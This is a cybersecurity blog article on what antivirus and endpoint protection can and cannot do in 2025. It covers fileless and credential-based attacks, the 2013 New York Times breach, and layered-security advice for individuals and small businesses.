In 2025, cyber threats remain pervasive and increasingly sophisticated. More than 500,000 new malware samples are discovered each day, including ransomware, trojans, credential stealers, and cryptominers. For many attacks, the first point of contact is still individual endpoints: laptops, desktops, and mobile devices used by employees and individuals.
These figures show that endpoint protection, commonly called antivirus, remains relevant even as the threat landscape evolves. This article examines what antivirus can and cannot do today, where it remains effective, where it struggles, and how individuals and small organisations should think about it within a broader security strategy.
Understanding Modern Antivirus
Early antivirus products relied on malware signatures, distinctive code patterns used to recognise known threats. If a file matched a signature, it was blocked. This approach was effective in an era of widely reused threats.
Modern malware has changed the rules. Many attacks now operate entirely in memory without leaving files, abuse legitimate system tools such as PowerShell or remote administration utilities, or generate unique variants designed to evade static detection.
In response, antivirus software has evolved into broader endpoint protection. Modern solutions combine multiple detection techniques, including signature scanning, behavioural analysis, cloud reputation intelligence, exploit mitigation, and ransomware controls. Business versions often add centralised monitoring and alerting. This evolution enables antivirus to reduce exposure and provide insight across endpoints, even though no single control can guarantee complete protection.
Why Endpoint Protection Still Matters
Malware remains widespread, and many devices continue to be exposed to everyday threats. Hundreds of thousands of new samples appear every day, and independent testing consistently shows that leading endpoint protection products block more than 99 percent of widely known threats. Research also indicates that a substantial share of malware infections in small businesses occurs on devices with antivirus installed, suggesting that many infections could have been avoided with updated and properly configured protection.
This matters because the majority of incidents still start with common, opportunistic threats. Someone opens an unsafe attachment, downloads a compromised installer, or clicks a malicious link. In these moments, endpoint protection acts as a safety net. For individuals and small organisations, that safety net remains one of the most cost-effective controls available.
The scale of modern threats helps explain why endpoint protection remains necessary.
Source: Kaspersky Security Bulletin 2025, “The Number of the Year: Kaspersky Detected Half a Million Malicious Files Daily in 2025.”
What Antivirus Still Does Well
Although some discussions suggest antivirus is obsolete, it remains effective in several areas.
Blocking Commodity Malware: Most real-world infections involve known, widely circulating threats. Modern endpoint engines consistently block these threats before they execute, preventing many infections and reducing downtime and recovery costs.
Reducing Routine Exposure: Many compromises stem from default credentials, unpatched software, or careless downloads. Endpoint protection intercepts much of this background noise, lowering the chance that routine errors escalate into incidents.
Basic Ransomware Safeguards: Many products include controls that monitor suspicious encryption behaviour, protect key folders, and provide rollback or recovery options. These features do not stop every ransomware attack, but can significantly reduce its impact.
Visibility Across Endpoints: Business-grade solutions provide central dashboards that show blocked threats, alerts, and device status. This visibility helps small teams understand what is happening across their environment and respond more effectively.
Where Antivirus Struggles
Understanding the limitations of antivirus is as important as understanding its strengths.
Fileless and Living-off-the-Land Attacks: Some malware executes entirely in memory or leverages legitimate system tools such as Windows Management Instrumentation (WMI) and macros. Because these behaviours don’t involve obvious malicious files, traditional signature-based scanning may miss them.
Social Engineering and Identity-Based Attacks: No antivirus product can prevent a user from falling for a convincing phishing email, sharing credentials, or using weak authentication. In many breaches, attackers gain access through stolen credentials rather than malicious files.
Sophisticated Targeted Attacks: When adversaries use custom malware or stolen credentials, signature-based controls offer limited value. Detection depends more on behavioural monitoring, anomaly detection, and human investigation.
Real Incident: The New York Times Breach
A well-documented example of antivirus limitations occurred with the 2013 breach of The New York Times. Attackers maintained access over several months using custom malware variants, and only a small fraction were detected by the organisation’s antivirus.
The breach was enabled by stolen credentials and evasion techniques that bypassed traditional signature scanning. This case illustrates why modern compromises often require layered detection and response beyond traditional antivirus.
Evaluating Antivirus for Individuals
For personal use, antivirus remains a sensible baseline. Devices used for everyday activities hold valuable information and are routinely targeted by automated threats.
In many cases, built-in protections such as Microsoft Defender provide sufficient baseline coverage when paired with good habits: keeping systems updated, using strong authentication, and avoiding suspicious downloads. Research shows that hygiene and behaviour influence outcomes as much as product choice. An up-to-date engine combined with sensible practices often outperforms a premium product that is poorly maintained.
Antivirus for Small Businesses
Small businesses face a different risk profile. They manage customer data, handle payments, and often lack dedicated security teams. The financial and operational impact of an incident can be significant.
For these organisations, antivirus remains necessary but should be treated as the starting point rather than the complete solution. Effective setups typically include centrally managed endpoint protection, device inventory and monitoring, alert workflows, regular patching, and tested backups. Without visibility and response processes, even good detection can go unused.
Surveys have found that 100% of organisations reporting ransomware incidents were running antivirus at the time, yet the attacks still succeeded.
Antivirus Is One Layer in a Broader Strategy
As organisations grow or handle more sensitive data, security becomes layered by design. Endpoint protection sits alongside identity controls, email filtering, patch management, user awareness training, and reliable backup and recovery processes.
Current attack patterns reinforce this approach. Ransomware continues to affect smaller organisations disproportionately, phishing still drives many breaches, and attackers increasingly misuse legitimate tools. These trends shift attention away from sole reliance on file detection toward identity, behaviours, and resilience.
In this context, antivirus plays a supporting role. It helps reduce everyday noise and blocks common threats, allowing teams to focus on higher-risk activity.
Practical Guidance for Decision-Making
A useful way to think about antivirus is as a baseline safeguard.
For individuals, a reputable solution combined with good digital habits is usually sufficient for everyday risk.
For small businesses, endpoint protection should integrate with central visibility, timely patching, access controls, and backups.
For higher-risk or regulated environments, additional detection and response capabilities may be appropriate.
A simple risk assessment can clarify needs: What data loss would cause material damage? How quickly could the organisation recover from ransomware? Who reviews alerts and investigates suspicious activity? Where those answers are weak, strengthening identity controls and recovery planning often reduces more risk than adding more endpoint features.
Conclusion
Antivirus remains effective at blocking commodity malware, reducing exposure to opportunistic threats, and providing useful visibility across endpoints. It continues to prevent many everyday incidents.
At the same time, modern attacks increasingly target identities, behaviours, and trusted tools; areas that sit partly outside the reach of traditional detection.
For most individuals and small organisations, antivirus remains a practical and cost-effective foundation. Treated as one control among many, it supports a resilient security posture. Understanding what it can and cannot do helps organisations allocate resources wisely and reduce avoidable surprises.
Stay ahead of cyber threats with practical tips, real insights, and expert guidance. Subscribe to the Cyberkach blog or join our newsletter for actionable cybersecurity advice delivered straight to your inbox.